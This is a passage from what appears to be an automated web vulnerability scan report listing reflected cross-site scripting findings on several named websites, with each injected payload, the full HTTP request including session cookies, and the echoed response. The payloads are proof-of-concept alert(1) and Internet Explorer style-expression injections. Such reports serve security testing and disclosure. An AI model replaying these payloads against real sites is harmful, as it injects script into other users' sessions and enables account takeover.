The value of the issa_connect_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4690"><script>alert(1)</script>09816dd2c35 was submitted in the issa_connect_url parameter. This input was echoed as f4690\"><script>alert(1)</script>09816dd2c35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Members/Log-In.php?issa_connect_url=http%3A%2F%2Fconnect.issa.org%2Ff4690"><script>alert(1)</script>09816dd2c35 HTTP/1.1
Host: www.issa.org
Connection: keep-alive
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookiecheck=issa; PHPSESSID=58bc1c5fb54b2663fa52961484237ae2; cookiecheck=issa

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:14 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 15025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta nam
...[SNIP]...
<input type="hidden" name="issa_connect_url" value="http://connect.issa.org/f4690\"><script>alert(1)</script>09816dd2c35">
...[SNIP]...

3.771. https://www.issa.org/Members/Log-In.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.issa.org
Path:	/Members/Log-In.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425af"><script>alert(1)</script>3ad08b998a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 425af\"><script>alert(1)</script>3ad08b998a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Members/Log-In.php?issa_connect_url=http%3A%2F%2Fconnect.issa.or/425af"><script>alert(1)</script>3ad08b998a6g%2F HTTP/1.1
Host: www.issa.org
Connection: keep-alive
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookiecheck=issa; PHPSESSID=58bc1c5fb54b2663fa52961484237ae2; cookiecheck=issa

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:31 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 15026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta nam
...[SNIP]...
<input type="hidden" name="issa_connect_url" value="http://connect.issa.or/425af\"><script>alert(1)</script>3ad08b998a6g/">
...[SNIP]...

3.772. https://www.kryptronic.com/index.php [core--login--password parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.kryptronic.com
Path:	/index.php

Issue detail

The value of the core--login--password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bb09"><script>alert(1)</script>1108a4f06aaefe0aa was submitted in the core--login--password parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /index.php?sid=jvvn13b9610410062708586152403764&app=ecom&ns=login_proc&coactive=1&core--login--user=%0d&core--login--password=%0d2bb09%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e1108a4f06aaefe0aa HTTP/1.1
Host: www.kryptronic.com
Connection: keep-alive
Referer: https://www.kryptronic.com/index.php?app=ecom&ns=checkoutfn&sid=jvvn13b9610410062708586152403764&portrelay=1
Cache-Control: max-age=0
Origin: https://www.kryptronic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=jvvn13b9610410062708586152403764; __utmz=106393177.1303939152.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=106393177.22212080.1303939152.1303939152.1303939152.1; __utmc=106393177; __utmb=106393177.15.10.1303939152

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:28:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: must-revalidate
Expires: Wed, 27 Apr 2011 20:28:22 GMT
Content-Length: 27740
Last-Modified: Wed, 27 Apr 2011 21:28:22 GMT
X-Powered-By: Kryptronic/7.1.0
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-ty
...[SNIP]...
<input class="formfield" type="password" name="core--login--password" id="core--login--password" value="2bb09"><script>alert(1)</script>1108a4f06aaefe0aa" size="25" maxlength="150" />
...[SNIP]...

3.773. https://www.kryptronic.com/index.php [core--login--user parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.kryptronic.com
Path:	/index.php

Issue detail

The value of the core--login--user request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90215"><script>alert(1)</script>a92c57e96622f2b8e was submitted in the core--login--user parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /index.php?sid=jvvn13b9610410062708586152403764&app=ecom&ns=login_proc&coactive=1&core--login--user=%0d90215%22%3e%3cscript%3ealert%281%29%3c%2fscript%3ea92c57e96622f2b8e&core--login--password=%0d HTTP/1.1
Host: www.kryptronic.com
Connection: keep-alive
Referer: https://www.kryptronic.com/index.php?app=ecom&ns=checkoutfn&sid=jvvn13b9610410062708586152403764&portrelay=1
Cache-Control: max-age=0
Origin: https://www.kryptronic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=jvvn13b9610410062708586152403764; __utmz=106393177.1303939152.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=106393177.22212080.1303939152.1303939152.1303939152.1; __utmc=106393177; __utmb=106393177.15.10.1303939152

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:28:05 GMT
Server: Apache
Pragma: no-cache
Cache-Control: must-revalidate
Expires: Wed, 27 Apr 2011 20:28:06 GMT
Content-Length: 27848
Last-Modified: Wed, 27 Apr 2011 21:28:06 GMT
X-Powered-By: Kryptronic/7.1.0
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-ty
...[SNIP]...
<input class="formfield" type="text" name="core--login--user" id="core--login--user" value="90215"><script>alert(1)</script>a92c57e96622f2b8e" size="25" maxlength="150" />
...[SNIP]...

3.774. http://www.last.fm/ajax/getgloballisteners [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.last.fm
Path:	/ajax/getgloballisteners

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e21c5'-alert(1)-'3150260b12fccf2fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /ajax/getgloballistenerse21c5'-alert(1)-'3150260b12fccf2fb?limit=50&formtoken=2bcd67b944b9e63a7fd1b2c0c95a8d55947c66b3&_= HTTP/1.1
Host: www.last.fm
Proxy-Connection: keep-alive
Referer: http://www.last.fm/
Origin: http://www.last.fm
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AnonSession=3d00d94ac95477b0444fa0509596d5a6-6d1b8dee54f600bbe54429660a934846273695eac679714294b0eb30d9ce5d7d; AnonTrack=12dda283aa0e21b3cfede37e22d1798b; s_nr=1303947415942; s_lastvisit=1303947415972; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=24701223.1303947416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24701223.1626415800.1303947416.1303947416.1303947416.1; __utmc=24701223; __utmv=24701223.|2=VisitorStatus=Anonymous=1,; __utmb=24701223.3.10.1303947416

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 23:38:49 GMT
Server: Apache/1.3.39 (Unix)
X-Proxy-Fix-Up: headers fixed up
X-Web-Node: www176
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONi OUR PUBo IND UNI COM NAV INT DEM PRE", policyref="http://www.last.fm/help/last.p3p"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive
Content-Length: 36508

<!DOCTYPE html>
<html lang="en" class="no-js lastfm">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7,chrome=1" />
<link rel="profile" href="http://
...[SNIP]...
/boomerang/images/'
}
});
BOOMR.addVar({
anon_user: true,
country_code: 'us',
page_name: 'Ajax/Getgloballistenerse21c5'-alert(1)-'3150260b12fccf2fb/'
});
</script>
...[SNIP]...

3.775. http://www.map-generator.net/ [address parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.map-generator.net
Path:	/

Issue detail

The value of the address request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dbcc"%20style%3dx%3aexpression(alert(1))%200c2aa2da5febe040 was submitted in the address parameter. This input was echoed as 3dbcc\\\" style=x:expression(alert(1)) 0c2aa2da5febe040 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?name=Spot&address=10+market+st%2C+san+francisco3dbcc"%20style%3dx%3aexpression(alert(1))%200c2aa2da5febe040&width=500&height=400&zoom=14&maptype=map&Submit=Submit HTTP/1.1
Host: www.map-generator.net
Proxy-Connection: keep-alive
Referer: http://www.map-generator.net/
Cache-Control: max-age=0
Origin: http://www.map-generator.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=22393895.1304016692.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; mapb=1304017290; maps=1304017290; __utma=22393895.2116306113.1303939641.1303939641.1304016692.2; __utmc=22393895; __utmb=22393895.10.10.1304016692

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 19:03:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Set-Cookie: mapb=1304017290; expires=Sun, 01-May-2011 19:03:06 GMT; path=/; domain=.map-generator.net
Set-Cookie: maps=1304017290; expires=Sat, 27-Apr-2013 19:03:06 GMT; path=/; domain=.map-generator.net
Set-Cookie: mapb=1304017386; expires=Sat, 28-May-2011 19:03:06 GMT; path=/; domain=.map-generator.net
Set-Cookie: maps=1304017386; expires=Sat, 27-Apr-2013 19:03:06 GMT; path=/; domain=.map-generator.net
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="text" name="address" value="10 market st, san francisco3dbcc\\\" style=x:expression(alert(1)) 0c2aa2da5febe040" onfocus="if (this.value == '10 market st, san francisco') this.value = '';" size="30" maxlength="255"/>
...[SNIP]...

3.776. http://www.map-generator.net/ [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.map-generator.net
Path:	/

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3edb3"%20style%3dx%3aexpression(alert(1))%20c419080a5e7c3be66 was submitted in the name parameter. This input was echoed as 3edb3\\\" style=x:expression(alert(1)) c419080a5e7c3be66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?name=Spot3edb3"%20style%3dx%3aexpression(alert(1))%20c419080a5e7c3be66&address=10+market+st%2C+san+francisco&width=500&height=400&zoom=14&maptype=map&Submit=Submit HTTP/1.1
Host: www.map-generator.net
Proxy-Connection: keep-alive
Referer: http://www.map-generator.net/
Cache-Control: max-age=0
Origin: http://www.map-generator.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=22393895.1304016692.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; mapb=1304017290; maps=1304017290; __utma=22393895.2116306113.1303939641.1303939641.1304016692.2; __utmc=22393895; __utmb=22393895.10.10.1304016692

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 19:02:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Set-Cookie: mapb=1304017290; expires=Sun, 01-May-2011 19:02:30 GMT; path=/; domain=.map-generator.net
Set-Cookie: maps=1304017290; expires=Sat, 27-Apr-2013 19:02:30 GMT; path=/; domain=.map-generator.net
Set-Cookie: mapb=1304017350; expires=Sat, 28-May-2011 19:02:30 GMT; path=/; domain=.map-generator.net
Set-Cookie: maps=1304017350; expires=Sat, 27-Apr-2013 19:02:30 GMT; path=/; domain=.map-generator.net
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="text" name="name" value="Spot3edb3\\\" style=x:expression(alert(1)) c419080a5e7c3be66" onfocus="if (this.value == 'Spot') this.value = '';" size="30" maxlength="255"/>
...[SNIP]...

3.777. http://www.map-generator.net/extmap.php [address parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.map-generator.net
Path:	/extmap.php

Issue detail

The value of the address request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6c6c"%20style%3dx%3aexpression(alert(1))%2058d6d814413 was submitted in the address parameter. This input was echoed as b6c6c\\\" style=x:expression(alert(1)) 58d6d814413 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /extmap.php?name=Network%20Vigilance&address=10731%20Treena%20Street%2C%20Suite%20200%2C%20San%20Diego%2C%20CA%2092131b6c6c"%20style%3dx%3aexpression(alert(1))%2058d6d814413&width=625&height=310&maptype=map&zoom=14&hl=en&t=1233200766 HTTP/1.1
Host: www.map-generator.net
Proxy-Connection: keep-alive
Referer: http://www.networkvigilance.com/main/Company/ContactUs.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:28:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Set-Cookie: mapb=1303939727; expires=Sat, 30-Apr-2011 21:28:47 GMT; path=/; domain=.map-generator.net
Set-Cookie: mapb=1303939727; expires=Fri, 27-May-2011 21:28:47 GMT; path=/; domain=.map-generator.net
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8490

<script src="http://maps.google.com/maps?file=api&v=2.x&key=ABQIAAAAsNaTrYI_ppibUKrD9B4vsRR-G8LqSX3VjXDBcvQWXC1NF0S6axQtS-T1RXV3I9rMTxEoCiCPG88LDw" type="text/javascript" charset="utf-8"></scr
...[SNIP]...
atellite Map to your homepage. With Map Generator, you just enter your address and copy a small HTML snippet onto you web page. - Network Vigilance @ 10731 Treena Street, Suite 200, San Diego, CA 92131b6c6c\\\" style=x:expression(alert(1)) 58d6d814413" />
...[SNIP]...

3.778. http://www.map-generator.net/extmap.php [address parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.map-generator.net
Path:	/extmap.php

Issue detail

The value of the address request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3c115%3balert(1)//fbe2485e9c1 was submitted in the address parameter. This input was echoed as 3c115;alert(1)//fbe2485e9c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /extmap.php?name=Network%20Vigilance&address=10731%20Treena%20Street%2C%20Suite%20200%2C%20San%20Diego%2C%20CA%2092131b6c6c%22%20style%3dx%3aexpression(alert(1))%2058d6d8144133c115%3balert(1)//fbe2485e9c1&width=625&height=310&maptype=map&zoom=14&hl=en&t=1233200766 HTTP/1.1
Host: www.map-generator.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: maps=1303940766; mapb=1303939727; __utmz=22393895.1304016692.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=22393895.2116306113.1303939641.1303939641.1304016692.2; __utmc=22393895; __utmb=22393895.2.10.1304016692

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:54:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Set-Cookie: mapb=1303939727; expires=Sun, 01-May-2011 18:54:07 GMT; path=/; domain=.map-generator.net
Set-Cookie: maps=1303940766; expires=Sat, 27-Apr-2013 18:54:07 GMT; path=/; domain=.map-generator.net
Set-Cookie: mapb=1304016847; expires=Sat, 28-May-2011 18:54:07 GMT; path=/; domain=.map-generator.net
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8627

<script src="http://maps.google.com/maps?file=api&v=2.x&key=ABQIAAAAsNaTrYI_ppibUKrD9B4vsRR-G8LqSX3VjXDBcvQWXC1NF0S6axQtS-T1RXV3I9rMTxEoCiCPG88LDw" type="text/javascript" charset="utf-8"></scr
...[SNIP]...
TypeControl());
var point = new GLatLng(32.9132235,-117.1137901);
var marker = createMarker(point,"10731 Treena Street, Suite 200, San Diego, CA 92131b6c6c\\\\" style=x:expression(alert(1)) 58d6d8144133c115;alert(1)//fbe2485e9c1","<div id=\"gmapmarker\">
...[SNIP]...

3.779. http://www.map-generator.net/extmap.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.map-generator.net
Path:	/extmap.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1a41"%20style%3dx%3aexpression(alert(1))%2015376975211 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1a41\\\" style=x:expression(alert(1)) 15376975211 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /extmap.php?name=Network%2520Vigilance&address=10731%2520Treena%2520Street%252C%2520Suite%2520200%252C%2520San%2520Diego%252C%2520CA%252092131b6c6c%2522%2520style%253dx%253aexpression(ale/e1a41"%20style%3dx%3aexpression(alert(1))%2015376975211rt(1 HTTP/1.1
Host: www.map-generator.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: maps=1304017305; mapb=1304017305; __utmz=22393895.1304016692.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=22393895.2116306113.1303939641.1303939641.1304016692.2; __utmc=22393895; __utmb=22393895.12.10.1304016692;

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 19:03:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Set-Cookie: mapb=1304017305; expires=Sun, 01-May-2011 19:03:13 GMT; path=/; domain=.map-generator.net
Set-Cookie: maps=1304017305; expires=Sat, 27-Apr-2013 19:03:13 GMT; path=/; domain=.map-generator.net
Set-Cookie: mapb=1304017393; expires=Sat, 28-May-2011 19:03:13 GMT; path=/; domain=.map-generator.net
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 8164

<script src="http://maps.google.com/maps?file=api&v=2.x&key=ABQIAAAAsNaTrYI_ppibUKrD9B4vsRR-G8LqSX3VjXDBcvQWXC1NF0S6axQtS-T1RXV3I9rMTxEoCiCPG88LDw" type="text/javascript" charset="utf-8"></scr
...[SNIP]...
ter your address and copy a small HTML snippet onto you web page. - Network%20Vigilance @ 10731%20Treena%20Street%2C%20Suite%20200%2C%20San%20Diego%2C%20CA%2092131b6c6c%22%20style%3dx%3aexpression(ale/e1a41\\\" style=x:expression(alert(1)) 15376975211rt(1" />
...[SNIP]...

3.780. http://www.map-generator.net/extmap.php [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.map-generator.net
Path:	/extmap.php

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f93"%20style%3dx%3aexpression(alert(1))%207c41acb6973 was submitted in the name parameter. This input was echoed as a1f93\\\" style=x:expression(alert(1)) 7c41acb6973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /extmap.php?name=Network%20Vigilancea1f93"%20style%3dx%3aexpression(alert(1))%207c41acb6973&address=10731%20Treena%20Street%2C%20Suite%20200%2C%20San%20Diego%2C%20CA%2092131&width=625&height=310&maptype=map&zoom=14&hl=en&t=1233200766 HTTP/1.1
Host: www.map-generator.net
Proxy-Connection: keep-alive
Referer: http://www.networkvigilance.com/main/Company/ContactUs.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:27:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Set-Cookie: mapb=1303939676; expires=Sat, 30-Apr-2011 21:27:56 GMT; path=/; domain=.map-generator.net
Set-Cookie: mapb=1303939676; expires=Fri, 27-May-2011 21:27:56 GMT; path=/; domain=.map-generator.net
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8432

<script src="http://maps.google.com/maps?file=api&v=2.x&key=ABQIAAAAsNaTrYI_ppibUKrD9B4vsRR-G8LqSX3VjXDBcvQWXC1NF0S6axQtS-T1RXV3I9rMTxEoCiCPG88LDw" type="text/javascript" charset="utf-8"></scr
...[SNIP]...
nt="Free Maps Generator to gently embed your own Map/Satellite Map to your homepage. With Map Generator, you just enter your address and copy a small HTML snippet onto you web page. - Network Vigilancea1f93\\\" style=x:expression(alert(1)) 7c41acb6973 @ 10731 Treena Street, Suite 200, San Diego, CA 92131" />
...[SNIP]...

3.781. http://www.map-generator.net/map.php [address parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.map-generator.net
Path:	/map.php

Issue detail

The value of the address request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80eeb"%20style%3dx%3aexpression(alert(1))%203f11a904dd1 was submitted in the address parameter. This input was echoed as 80eeb\\\" style=x:expression(alert(1)) 3f11a904dd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /map.php?name=Spot&address=10%20market%20st%2C%20san%20francisco80eeb"%20style%3dx%3aexpression(alert(1))%203f11a904dd1&width=500&height=400&maptype=map&zoom=14&t=1304017254 HTTP/1.1
Host: www.map-generator.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: maps=1304017305; mapb=1304017305; __utmz=22393895.1304016692.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=22393895.2116306113.1303939641.1303939641.1304016692.2; __utmc=22393895; __utmb=22393895.12.10.1304016692;

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 19:02:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Set-Cookie: mapb=1304017305; expires=Sun, 01-May-2011 19:02:57 GMT; path=/; domain=.map-generator.net
Set-Cookie: maps=1304017305; expires=Sat, 27-Apr-2013 19:02:57 GMT; path=/; domain=.map-generator.net
